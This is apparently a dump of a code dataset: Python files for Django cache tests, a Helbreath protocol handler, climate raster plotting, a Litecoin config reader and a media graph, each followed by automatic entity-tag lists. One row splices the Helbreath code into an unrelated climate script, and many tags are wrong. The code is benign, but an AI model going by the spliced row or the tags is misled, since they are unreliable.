'AdminBoundary.objects.fi'], ['URL', 'self.style.SU'], ['URL', 'self.random.sh'], ['URL', 'self.random.ch'], ['URL', 'pytz.al'], ['URL', 'rapidpro.io'], ['URL', 'self.style.SU'], ['URL', 'org.in'], ['URL', 'org.ca'], ['URL', 'g.gr'], ['URL', 'ContactGroup.sy'], ['URL', 'groups.fi'], ['URL', 'self.style.SU'], ['URL', 'User.objects.cr'], ['URL', 'org.id'], ['URL', 'org.id'], ['URL', 'user.se'], ['URL', 'org.ca'], ['URL', 'self.style.SU'], ['URL', 'org.ca'], ['URL', 'Channel.objects.cr'], ['URL', 'self.style.SU'], ['URL', 'org.ca'], ['URL', 'ContactField.objects.cr'], ['URL', 'org.ca'], ['URL', 'self.style.SU'], ['URL', 'org.ca'], ['URL', 'ContactGroup.cr'], ['URL', 'ContactGroup.us'], ['URL', 
'groups.cr'], ['URL', 'group.me'], ['URL', 'group.co'], ['URL', 'org.ca'], ['URL', 'self.style.SU'], ['URL', 'org.ca'], ['URL', 'Label.la'], ['URL', 'objects.cr'], ['URL', 'self.style.SU'], ['URL', 'org.ca'], ['URL', 'org.im'], ['URL', 'self.style.SU'], ['URL', 'org.ca'], ['URL', 'Contact.ge'], ['URL', 'org.ca'], ['URL', 'self.style.SU'], ['URL', 'ContactGroup.contacts.th'], ['URL', 'six.mo'], ['URL', 'self.ba'], ['URL', 'self.pro'], ['URL', 'org.ca'], ['URL', 'self.pro'], ['URL', 'name.re'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'g.me'], ['URL', 'g.me'], ['URL', 'self.pro'], ['URL', 'g.me'], ['URL', 'self.ba'], ['URL', 'counts.it'], ['URL', 'group.co'], ['URL', 'URN.fr'], ['URL', 'URN.fr'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'ContactGroup.contacts.th'], ['URL', 'ContactGroup.contacts.th'], ['URL', 'transaction.at'], ['URL', 'org.ca'], ['URL', 'self.st'], ['URL', 'transaction.at'], ['URL', 'self.pro'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'self.pro'], ['URL', 'org.ca'], ['URL', 'group.contacts.va'], ['URL', 'flow.na'], ['URL', 'group.na'], ['URL', 'org.na'], ['URL', 'FlowStart.cr'], ['URL', 'start.st'], ['URL', 'org.ca'], ['URL', 'Contact.objects.ge'], ['URL', 'org.ca'], ['URL', 'contact.id'], ['URL', 'flow.na'], ['URL', 'contact.id'], ['URL', 'org.na'], ['URL', 'flow.st'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.na'], ['URL', 'org.ca'], ['URL', 'FlowRun.objects.fi'], ['URL', 'org.ca'], ['URL', 'Contact.objects.ge'], ['URL', 'contact.urns.fi'], ['URL', 'flow.na'], ['URL', 'flow.org.na'], ['URL', 'flow.in'], ['URL', 'flow.org.ca'], ['URL', 'Msg.cr'], ['URL', 'flow.org'], ['URL', 'org.ca'], ['URL', 'org.na'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'Contact.objects.ge'], ['URL', 'org.ca'], ['URL', 'contact.urns.fi'], ['URL', 'Msg.cr'], ['URL', 'self.org'], ['URL', 'timezone.no'], ['URL', 'sys.pl'], ['URL', 'resource.ge'], ['URL', 'resource.RU'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'connection.cu'], ['URL', 'connection.cu']]"
87,"import unittest
import re
from nose.tools import eq_, ok_
from django.test.client import RequestFactory
from django.core.cache import cache
from fancy_cache.memory import find_urls
from . import views
class TestViews(unittest.TestCase):
def setUp(self):
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_render_home1(self):
request = self.factory.get('/anything')
response = views.home(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode(""utf8"")))
random_string_1 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0]
# do it again
response = views.home(request)
eq_(response.status_code, 200)
random_string_2 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0]
eq_(random_string_1, random_string_2)
def test_render_home2(self):
authenticated = RequestFactory(AUTH_USER='peter')
request = self.factory.get('/2')
response = views.home2(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode(""utf8"")))
random_string_1 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0]
# do it again
response = views.home2(request)
eq_(response.status_code, 200)
random_string_2 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0]
eq_(random_string_1, random_string_2)
# do it again, but with a hint to disable cache
request = authenticated.get('/2')
response = views.home2(request)
eq_(response.status_code, 200)
random_string_2 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0]
ok_(random_string_1 != random_string_2)
def test_render_home3(self):
request = self.factory.get('/anything')
response = views.home3(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode(""utf8"")))
random_string_1 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0]
ok_('In your HTML' in response.content.decode(""utf8""))
extra_random_1 = re.findall('In your HTML:(\w+)', response.content.decode(""utf8""))[0]
response = views.home3(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode(""utf8"")))
random_string_2 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0]
extra_random_2 = re.findall('In your HTML:(\w+)', response.content.decode(""utf8""))[0]
ok_('In your HTML' in response.content.decode(""utf8""))
eq_(random_string_1, random_string_2)
# the post_process_response is only called once
eq_(extra_random_1, extra_random_2)
def test_render_home3_no_cache(self):
factory = RequestFactory(AUTH_USER='peter')
request = factory.get('/3')
response = views.home3(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode(""utf8"")))
ok_('In your HTML' not in response.content.decode(""utf8""))
def test_render_home4(self):
request = self.factory.get('/4')
response = views.home4(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode(""utf8"")))
random_string_1 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0]
ok_('In your HTML' in response.content.decode(""utf8""))
extra_random_1 = re.findall('In your HTML:(\w+)', response.content.decode(""utf8""))[0]
response = views.home4(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode(""utf8"")))
random_string_2 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0]
extra_random_2 = re.findall('In your HTML:(\w+)', response.content.decode(""utf8""))[0]
ok_('In your HTML' in response.content.decode(""utf8""))
eq_(random_string_1, random_string_2)
# the post_process_response is now called every time
ok_(extra_random_1 != extra_random_2)
def test_render_home5(self):
request = self.factory.get('/4', {'foo': 'bar'})
response = views.home5(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode(""utf8"")))
random_string_1 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0]
request = self.factory.get('/4', {'foo': 'baz'})
response = views.home5(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode(""utf8"")))
random_string_2 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0]
ok_(random_string_1 != random_string_2)
request = self.factory.get('/4', {'foo': 'baz', 'other': 'junk'})
response = views.home5(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode(""utf8"")))
random_string_3 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0]
eq_(random_string_2, random_string_3)
def test_render_home5bis(self):
request = self.factory.get('/4', {'foo': 'bar'})
response = views.home5bis(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode(""utf8"")))
random_string_1 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0]
request = self.factory.get('/4', {'foo': 'baz'})
response = views.home5bis(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode(""utf8"")))
random_string_2 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0]
ok_(random_string_1 != random_string_2)
request = self.factory.get('/4', {'foo': 'baz', 'bar': 'foo'})
response = views.home5bis(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode(""utf8"")))
random_string_3 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0]
eq_(random_string_2, random_string_3)
def test_remember_stats_all_urls(self):
request = self.factory.get('/anything')
response = views.home6(request)
eq_(response.status_code, 200)
# now ask the memory thing
match, = find_urls(urls=['/anything'])
eq_(match[0], '/anything')
eq_(match[2]['hits'], 0)
eq_(match[2]['misses'], 1)
# second time
response = views.home6(request)
eq_(response.status_code, 200)
match, = find_urls(urls=['/anything'])
eq_(match[0], '/anything')
eq_(match[2]['hits'], 1)
eq_(match[2]['misses'], 1)
def test_remember_stats_all_urls_looong_url(self):
request = self.factory.get(
'PI:KEY'
'test/that/things/work/with/long/urls/too',
{
'line1': 'Bad luck, wind been blowing at my back',
'line2': ""I was born to bring trouble to wherever I'm at"",
'line3': ""Got the number thirteen, tattooed on my neck"",
'line4': ""When the ink starts to itch, "",
'line5': ""then the black will turn to red"",
}
)
response = views.home6(request)
eq_(response.status_code, 200)
# now ask the memory thing
match, = find_urls()
ok_(match[0].startswith('/something/really'))
eq_(match[2]['hits'], 0)
eq_(match[2]['misses'], 1)
# second time
response = views.home6(request)
eq_(response.status_code, 200)
match, = find_urls([])
ok_(match[0].startswith('/something/really'))
eq_(match[2]['hits'], 1)
eq_(match[2]['misses'], 1)
",7974,"[['LOCATION', 'TestCase'], ['LOCATION', 'random_string_2'], ['LOCATION', 'random_string_2'], ['LOCATION', 'random_string_2'], ['NRP', 'post_process_response'], ['LOCATION', 'random_string_2'], ['NRP', 'post_process_response'], ['URL', 'self.factory.ge'], ['URL', 'self.factory.ge'], ['URL', 'nose.to'], ['URL', 'django.test.cl'], ['URL', 'django.core.ca'], ['URL', 'cache.me'], ['URL', 'cache.cl'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'authenticated.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.content.de'], ['URL', 'factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.st'], ['URL', 'response.st'], ['URL', 'response.st'], ['URL', 'response.st']]"
88,"#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# hb_balancer
# High performance load balancer between Helbreath World Servers.
#
# Copyright (C) 2012 Michał Papierski dummy@email.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
import struct
import random
import logging
from twisted.internet import reactor
from twisted.protocols.stateful import StatefulProtocol
from twisted.python import log
from packets import Packets
class BaseHelbreathProtocol(StatefulProtocol):
''' Basic Helbreath Protocol '''
def getInitialState(self):
'''
Protocol overview:
[Key unsigned byte] [Size unsigned short] [Data Size-bytes]
'''
return (self.get_key, 1)
def get_key(self, data):
''' Get key '''
self.key, = struct.unpack('<B', data)
return (self.get_data_size, 2)
def get_data_size(self, data):
''' Get data size '''
self.data_size, = struct.unpack('<H', data)
return (self.get_data, self.data_size - 3)
def get_data(self, data):
''' Get and decode data '''
if self.key > 0:
# Decode
data = list(data)
for i in range(len(data)):
data[i] = chr(((ord(data[i]) ^ (self.key ^ (self.data_size - 3 - i))) - (i ^ self.key)) % 256)
data = ''.join(data)
# Pass decoded data
self.raw_data(data)
return (self.get_key, 1)
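# Illustrative note, not part of the original module: the decode above is the
# exact inverse of send_message below. Encoding adds (i ^ key) and then XORs
# with (key ^ (len(data) - i)); decoding XORs with (key ^ (data_size - 3 - i))
# and subtracts (i ^ key), which round-trips because the transmitted size is
# len(data) + 3 (one key byte plus a two-byte size word plus the payload).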
def send_message(self, data):
''' Send a Helbreath Packet data '''
key = random.randint(0, 255)
if key > 0:
# Encode
data = list(data)
for i in range(len(data)):
data[i] = chr(((ord(data[i]) + (i ^ key)) ^ (key ^ (len(data) - i))) % 256)
data = ''.join(data)
self.transport.write(struct.pack('<BH', key, len(data) + 3) + data)
def sort_files( files, split_on='_', elem_month=-2, elem_year=-1 ):
'''
sort a list of files by the month and year in the filename, where names
end in '_MM_YYYY.tif'. If sorted using base
Python's sort/sorted functions, things will be sorted by the first character
of the month, which makes things go 1, 11, ... which is wrong for timeseries.
This sorts it properly, following SNAP standards as the default settings.
ARGUMENTS:
----------
files = [list] list of `str` pathnames to be sorted by month and year. usually from glob.glob.
split_on = [str] `str` character to split the filename on. default:'_', SNAP standard.
elem_month = [int] slice element from resultant split filename list. Follows Python slicing syntax.
default:-2. For SNAP standard.
elem_year = [int] slice element from resultant split filename list. Follows Python slicing syntax.
default:-1. For SNAP standard.
RETURNS:
--------
sorted `list` by month and year ascending.
'''
import pandas as pd
months = [ int(os.path.basename( fn ).split('.')[0].split( split_on )[elem_month]) for fn in files ]
years = [ int(os.path.basename( fn ).split('.')[0].split( split_on )[elem_year]) for fn in files ]
df = pd.DataFrame( {'fn':files, 'month':months, 'year':years} )
df_sorted = df.sort_values( ['year', 'month' ] )
return df_sorted.fn.tolist()
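# Illustrative usage sketch, not part of the original script; the filenames
# are hypothetical but follow the '_MM_YYYY.tif' convention assumed above:
#
#   files = ['tas_11_1901.tif', 'tas_01_1902.tif', 'tas_02_1901.tif']
#   sort_files(files)
#   # -> ['tas_02_1901.tif', 'tas_11_1901.tif', 'tas_01_1902.tif']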
def only_years( files, begin=1901, end=2100, split_on='_', elem_year=-1 ):
'''
return new list of filenames where they are truncated to begin:end
ARGUMENTS:
----------
files = [list] list of `str` pathnames to be sorted by month and year. usually from glob.glob.
begin = [int] four digit integer year of the begin time default:1901
end = [int] four digit integer year of the end time default:2100
split_on = [str] `str` character to split the filename on. default:'_', SNAP standard.
elem_year = [int] slice element from resultant split filename list. Follows Python slicing syntax.
default:-1. For SNAP standard.
RETURNS:
--------
sliced `list` to begin and end year.
'''
import pandas as pd
years = [ int(os.path.basename( fn ).split('.')[0].split( split_on )[elem_year]) for fn in files ]
df = pd.DataFrame( { 'fn':files, 'year':years } )
df_slice = df[ (df.year >= begin ) & (df.year <= end ) ]
return df_slice.fn.tolist()
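# Illustrative usage sketch, not part of the original script: trim a glob of
# SNAP-style filenames to the 1950-1960 window before sorting:
#
#   files = only_years(glob.glob('*.tif'), begin=1950, end=1960)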
def masked_mean( fn, bounds=None ):
''' get mean of the full domain since the data are already clipped
mostly used for processing lots of files in parallel.'''
import numpy as np
import rasterio
with rasterio.open( fn ) as rst:
if bounds:
window = rst.window( *bounds )
else:
window = rst.window( *rst.bounds )
mask = (rst.read_masks( 1, window=window ) == 0) # read the mask over the same window as the data
arr = np.ma.masked_array( rst.read( 1, window=window ), mask=mask )
return np.mean( arr )
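# Illustrative note, not part of the original script: masked_mean hides the
# nodata cells reported by the raster's mask band and averages the rest;
# mp_map below fans this function out across many files in parallel.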
if __name__ == '__main__':
import os, glob
import geopandas as gpd
import numpy as np
import xarray as xr
import matplotlib
matplotlib.use( 'agg' )
from matplotlib import pyplot as plt
from pathos.mp_map import mp_map
import pandas as pd
import geopandas as gpd
# args / set working dir
base_dir = '/workspace/Shared/Tech_Projects/EPSCoR_Southcentral/project_data'
os.chdir( base_dir )
# scenarios = ['rcp60', 'rcp85']
scenarios = ['historical']
shp_fn = '/workspace/Shared/Tech_Projects/EPSCoR_Southcentral/project_data/SCTC_studyarea/Kenai_StudyArea.shp'
shp = gpd.read_file( shp_fn )
bounds = shp.bounds
# models = ['5ModelAvg','CRU_TS323','GFDL-CM3','GISS-E2-R','IPSL-CM5A-LR','MRI-CGCM3','NCAR-CCSM4']
# models = ['GFDL-CM3','GISS-E2-R','IPSL-CM5A-LR','MRI-CGCM3','NCAR-CCSM4']
models = ['ts323']
variables_list = [['pr']]# ['tasmax', 'tas', 'tasmin']]#,
# models = ['CRU_TS323']
# begin_end_groups = [[2016,2016],[2010,2020],[2095, 2100]]
begin_end_groups = [[1916, 1916],[1950, 1960],[1995, 2000]]
for scenario in scenarios:
for variables in variables_list:
for m in models:
for begin, end in begin_end_groups: # not fully wired-up yet
if m == 'ts323':
old_dir = 'PI:KEY'
# begin = 1950
# end = 1965
else:
if scenario == 'historical':
old_dir = '/Data/Base_Data/Climate/AK_CAN_2km/historical/AR5_CMIP5_models'
# begin = 1950
# end = 1965
else:
old_dir = '/Data/Base_Data/Climate/AK_CAN_2km/projected/AR5_CMIP5_models'
# begin = 2095
# end = 2100
figsize = (16,9)
out = {}
for v in variables:
path = os.path.join( base_dir,'downscaled', m, scenario, v )
print( path )
files = glob.glob( os.path.join( path, '*.tif' ) )
files = sort_files( only_years( files, begin=begin, end=end, split_on='_', elem_year=-1 ) )
out[ v ] = mp_map( masked_mean, files, nproc=4 )
if v == 'tas' or v == 'pr':
if m == 'ts323':
path = os.path.join( old_dir, v )
print( path )
else:
path = os.path.join( old_dir, scenario, m, v )
files = glob.glob( os.path.join( path, '*.tif' ) )
files = sort_files( only_years( files, begin=begin, end=end, split_on='_', elem_year=-1 ) )
out[ v+'_old' ] = mp_map( masked_mean, files, nproc=4 )
# nofix
path = os.path.join( base_dir,'downscaled_pr_nofix', m, scenario, v )
print( path )
files = glob.glob( os.path.join( path, '*.tif' ) )
files = sort_files( only_years( files, begin=begin, end=end, split_on='_', elem_year=-1 ) )
out[ v+'_nofix' ] = mp_map( masked_mean, files, nproc=4 )
plot_df = pd.DataFrame( out )
plot_df.index = pd.date_range( start=str(begin), end=str(end+1), freq='M' )
# sort the columns for output plotting cleanliness:
if 'tas' in variables:
col_list = ['tasmax', 'tas_old', 'tas', 'tasmin']
elif 'pr' in variables:
col_list = ['pr', 'pr_old', 'pr_nofix']
plot_df = plot_df[ col_list ] # get em in the order for plotting
if v == 'pr':
plot_df = plot_df.round()[['pr','pr_old']]
# now plot the dataframe
if begin == end:
title = 'EPSCoR SC AOI Temp Metrics {} {} {}'.format( m, scenario, begin )
else:
title = 'EPSCoR SC AOI Temp Metrics {} {} {} - {}'.format( m, scenario, begin, end )
if 'tas' in variables:
colors = ['red', 'black', 'blue', 'red' ]
else:
colors = [ 'blue', 'black', 'darkred' ]
ax = plot_df.plot( kind='line', title=title, figsize=figsize, color=colors )
output_dir = os.path.join( base_dir, 'compare_downscaling_versions_PR_no_fix' )
if not os.path.exists( output_dir ):
os.makedirs( output_dir )
# now plot the dataframe
out_metric_fn = 'temps'
if 'pr' in variables:
out_metric_fn = 'prec'
if begin == end:
output_filename = os.path.join( output_dir,'mean_{}_epscor_sc_{}_{}_{}.png'.format( out_metric_fn, m, scenario, begin ) )
else:
output_filename = os.path.join( output_dir,'mean_{}_epscor_sc_{}_{}_{}_{}.png'.format( out_metric_fn, m, scenario, begin, end ) )
plt.savefig( output_filename, dpi=400 )
plt.close()
# # # PRISM TEST VERSION DIFFERENCES # # # # # # #
# import rasterio
# import numpy as np
# import os, glob, itertools
# base_path = '/workspace/Shared/Tech_Projects/EPSCoR_Southcentral/project_data/prism/raw_prism'
# variables = [ 'tmax', 'tmin' ]
# for variable in variables:
# ak_olds = sorted( glob.glob( os.path.join( base_path, 'prism_raw_older', 'ak', variable, '*.asc' ) ) )
# ak_news = sorted( glob.glob( os.path.join( base_path, 'prism_raw_2016', 'ak', variable, '*.asc' ) ) )
# olds = np.array([ rasterio.open( i ).read( 1 ) for i in ak_olds if '_14' not in i ])
# news = np.array([ rasterio.open( i ).read( 1 ) *.10 for i in ak_news if '_14' not in i ])
# out = olds - news
# out[ (olds == -9999.0) | (news == -9999.0) ] = 0
# uniques = np.unique( out )
# uniques[ uniques > 0.01 ]
",9041,"[['PERSON', 'tasmax'], ['NRP', 'GeoTiff'], ['PERSON', 'lons'], ['PERSON', 'Rasterize'], ['LOCATION', 'split_on='], ['DATE_TIME', 'the month and year'], ['DATE_TIME', 'the month'], ['DATE_TIME', '11'], ['DATE_TIME', 'month'], ['PERSON', 'RETURNS'], ['DATE_TIME', 'year'], ['DATE_TIME', ""'year'""], ['DATE_TIME', ""'month'""], ['LOCATION', 'split_on='], ['DATE_TIME', 'month'], ['PERSON', 'RETURNS'], ['DATE_TIME', 'end year'], ['PERSON', 'geopandas'], ['PERSON', 'geopandas'], ['PERSON', 'os.chdir'], ['DATE_TIME', '1916'], ['DATE_TIME', '2000'], ['DATE_TIME', '1950'], ['DATE_TIME', '1965'], ['DATE_TIME', '1950'], ['DATE_TIME', '1965'], ['LOCATION', 'split_on='], ['LOCATION', 'nproc=4'], ['LOCATION', 'split_on='], ['LOCATION', 'nproc=4'], ['LOCATION', 'split_on='], ['LOCATION', 'nproc=4'], ['LOCATION', 'out_metric_fn'], ['LOCATION', 'out_metric_fn'], ['LOCATION', 'glob'], ['URL', 'np.as'], ['URL', 'np.as'], ['URL', 'Affine.tr'], ['URL', 'Affine.sc'], ['URL', 'np.na'], ['URL', 'glob.gl'], ['URL', 'os.path.ba'], ['URL', 'os.path.ba'], ['URL', 'df.so'], ['URL', 'sorted.fn.to'], ['URL', 'glob.gl'], ['URL', 'os.path.ba'], ['URL', 'df.ye'], ['URL', 'df.ye'], ['URL', 'slice.fn.to'], ['URL', 'rst.bo'], ['URL', 'rst.re'], ['URL', 'np.ma.ma'], ['URL', 'rst.re'], ['URL', 'np.me'], ['URL', 'matplotlib.us'], ['URL', 'pathos.mp'], ['URL', 'os.ch'], ['URL', 'StudyArea.sh'], ['URL', 'gpd.re'], ['URL', 'shp.bo'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'df.in'], ['URL', 'df.ro'], ['URL', 'df.pl'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'os.ma'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'plt.sa'], ['URL', 'plt.cl'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'np.ar'], ['URL', 'np.ar']]"
92,"# Copyright (c) 2010 Witchspace dummy@email.com
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the ""Software""), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
""""""
Utilities for reading litecoin configuration files.
""""""
def read_config_file(filename):
""""""
Read a simple ``'='``-delimited config file.
Raises :const:`IOError` if unable to open the file, or :const:`ValueError`
if a parse error occurs.
""""""
f = open(filename)
try:
cfg = {}
for line in f:
line = line.strip()
if line and not line.startswith(""#""):
try:
(key, value) = line.split('=', 1)
cfg[key] = value
except ValueError:
pass # Happens when line has no '=', ignore
finally:
f.close()
return cfg
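# Illustrative usage sketch, not part of the original module; the file
# contents shown are hypothetical:
#
#   # given a litecoin.conf containing:
#   #   rpcuser=alice
#   #   rpcpassword=secret
#   cfg = read_config_file('/home/alice/.litecoin/litecoin.conf')
#   cfg['rpcuser']  # -> 'alice'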
def read_default_config(filename=None):
""""""
Read litecoin default configuration from the current user's home directory.
Arguments:
- `filename`: Path to a configuration file in a non-standard location (optional)
""""""
if filename is None:
import os
import platform
home = os.getenv(""HOME"")
if not home:
raise IOError(""Home directory not defined, don't know where to look for config file"")
if platform.system() == ""Darwin"":
location = 'Library/Application Support/Litecoin/litecoin.conf'
else:
location = '.litecoin/litecoin.conf'
filename = os.path.join(home, location)
elif filename.startswith(""~""):
import os
filename = os.path.expanduser(filename)
try:
return read_config_file(filename)
except (IOError, ValueError):
pass # Cannot read config file, ignore
",2706,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2010'], ['LOCATION', 'Witchspace'], ['LOCATION', 'DAMAGES'], ['PERSON', 'WHETHER'], ['PERSON', 'platform.system'], ['PERSON', 'Darwin'], ['URL', 'email.com'], ['URL', 'line.st'], ['URL', 'line.st'], ['URL', 'f.cl'], ['URL', 'os.ge'], ['URL', 'platform.sy'], ['URL', 'litecoin.co'], ['URL', 'litecoin.co'], ['URL', 'os.path.jo'], ['URL', 'filename.st'], ['URL', 'os.pa']]"
93,"#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Smewt - A smart collection manager
# Copyright (c) 2010 Nicolas Wack dummy@email.com
#
# Smewt is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# Smewt is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from pygoo import MemoryObjectGraph, Equal, ontology
from guessit.slogging import setupLogging
from smewt import config
from smewt.ontology import Episode, Movie, Subtitle, Media, Config
from smewt.base import cache, utils, Collection
from smewt.base.taskmanager import TaskManager, FuncTask
from smewt.taggers import EpisodeTagger, MovieTagger
from smewt.plugins.feedwatcher import FeedWatcher
from threading import Timer
import smewt
import time
import os
import logging
log = logging.getLogger(__name__)
class VersionedMediaGraph(MemoryObjectGraph):
def __init__(self, *args, **kwargs):
super(VersionedMediaGraph, self).__init__(*args, **kwargs)
def add_object(self, node, recurse = Equal.OnIdentity, excluded_deps = list()):
result = super(VersionedMediaGraph, self).add_object(node, recurse, excluded_deps)
if isinstance(result, Media):
result.lastModified = time.time()
return result
def clear_keep_config(self):
# we want to keep our config object untouched
tmp = MemoryObjectGraph()
tmp.add_object(self.config)
super(VersionedMediaGraph, self).clear()
self.add_object(tmp.find_one(Config))
def __getattr__(self, name):
# if attr is not found and starts with an upper case letter, it might be the name
# of one of the registered classes. In that case, return a function that would instantiate
# such an object in this graph
if name[0].isupper() and name in ontology.class_names():
def inst(basenode = None, **kwargs):
result = super(VersionedMediaGraph, self).__getattr__(name)(basenode, **kwargs)
if isinstance(result, Media):
result.lastModified = time.time()
return result
return inst
raise AttributeError, name
